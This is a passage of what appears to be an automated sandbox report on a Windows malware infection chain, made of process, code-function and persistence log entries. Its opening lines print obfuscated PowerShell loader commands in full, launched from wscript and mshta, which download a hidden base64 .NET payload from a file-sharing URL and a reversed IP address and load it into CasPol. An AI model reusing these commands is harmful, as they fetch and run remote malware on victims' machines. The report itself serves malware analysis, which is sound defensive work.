                    Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
                    Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'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'+[chaR]34+'))')))"
                    Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
                    Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'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'+[chaR]34+'))')))"
                    Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.cmdline"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xijxxvat\xijxxvat.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,34_2_0041BCE3
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_000007FE89A3022D push eax; iretd 6_2_000007FE89A30241
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_000007FE89A300BD pushad ; iretd 6_2_000007FE89A300C1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_004567E0 push eax; ret 34_2_004567FE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_0045B9DD push esi; ret 34_2_0045B9E6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00463EF3 push ds; retf 34_2_00463EEC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00455EAF push ecx; ret 34_2_00455EC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00433FF6 push ecx; ret 34_2_00434009

                    Persistence and Installation Behavior

                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00406128 ShellExecuteW,URLDownloadToFileW,34_2_00406128
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\xijxxvat\xijxxvat.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,34_2_00419BC4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,34_2_0041BCE3
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
